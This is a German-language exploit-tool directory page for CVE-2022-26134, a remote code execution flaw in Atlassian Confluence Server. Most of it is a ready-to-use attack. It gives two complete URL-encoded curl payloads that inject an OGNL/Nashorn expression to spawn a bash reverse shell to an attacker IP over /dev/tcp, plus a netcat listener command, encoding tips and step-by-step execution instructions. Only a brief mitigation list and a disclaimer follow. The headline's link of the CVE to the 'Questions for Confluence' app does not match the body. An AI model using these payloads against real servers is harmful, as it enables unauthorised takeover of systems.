Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-26134 — Aktive Ausnutzung der Atlassian Questions for Confluence App CVE-2022-26134 | Kitploit
Tools/GitHubGitHub/khalidhaimur/cve-2022-26134
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-Tool
GitHubkhalidhaimur/cve-2022-26134

CVE-2022-26134

Aktive Ausnutzung der Atlassian Questions for Confluence App CVE-2022-26134

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Aktive Ausnutzung von Confluence CVE-2022-26134

Übersicht

CVE-2022-26134 ist eine kritische Remote Code Execution (RCE)-Sicherheitslücke, die Atlassian Confluence betrifft. Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern, durch das Einschleusen von OGNL-Ausdrücken in angreifbare Endpunkte beliebigen Code auszuführen.

Betroffene Versionen

  • Alle unterstützten Versionen von Atlassian Confluence Server und Data Center vor dem gepatchten Release.

Exploit-Details

Der folgende CURL-Befehl demonstriert die aktive Ausnutzung dieser Sicherheitslücke unter Verwendung der Java-Nashorn-Engine zur Ausführung einer Reverse Shell:

root@kitploit:~
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/

Bei diesen Änderungen müssen wir auch die URL-Kodierung berücksichtigen. Der Payload-String im Proof-of-Concept ist nicht vollständig URL-kodiert. Bestimmte Zeichen (insbesondere ".", "-" und "/") sind nicht kodiert. Obwohl das nicht immer der Fall ist, erweist sich dies für diesen Exploit als wichtig für die Funktionsfähigkeit des Payloads. Wenn eines dieser Zeichen kodiert wird, parst der Server die URL anders und der Payload könnte nicht ausgeführt werden. Das bedeutet, dass wir nach einer Modifikation keine URL-Kodierung auf den gesamten Payload anwenden können.

curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.118.4/4444%200%3E%261%27%29.start%28%29%22%29%7D/

Aufschlüsselung des Payloads

  1. ${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}
    • Verwendet die Java Nashorn-Skript-Engine zur Auswertung eines OGNL-Ausdrucks.
  2. new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()
    • Erzeugt eine Reverse Shell, die eine Verbindung zurück zu 10.0.0.28:1270 herstellt.

Ausführungsschritte

  1. Richten Sie einen Listener auf Ihrem Angriffsrechner ein:
    root@kitploit:~
    nc -lvnp 1270
    
  2. Führen Sie den CURL-Exploit-Befehl aus.
  3. Bei erfolgreicher Ausnutzung erhalten Sie eine Reverse Shell.

Gegenmaßnahmen

  • Atlassian hat Sicherheitspatches für betroffene Versionen veröffentlicht. Es wird dringend empfohlen, sofort auf die neueste Version zu aktualisieren.
  • Beschränken Sie den Zugriff auf Confluence-Server aus nicht vertrauenswürdigen Quellen.
  • Überwachen Sie Protokolle auf verdächtige Anfragen, die OGNL-Ausdrücke enthalten.

Referenzen

  • Atlassian Sicherheitshinweis
  • CVE-2022-26134 Details

Haftungsausschluss

Diese Dokumentation dient ausschließlich zu Bildungszwecken. Die unbefugte Ausnutzung von Systemen ist illegal und kann schwerwiegende Konsequenzen haben. Holen Sie stets die entsprechende Genehmigung ein, bevor Sie Sicherheitsbewertungen durchführen.

Tool herunterladen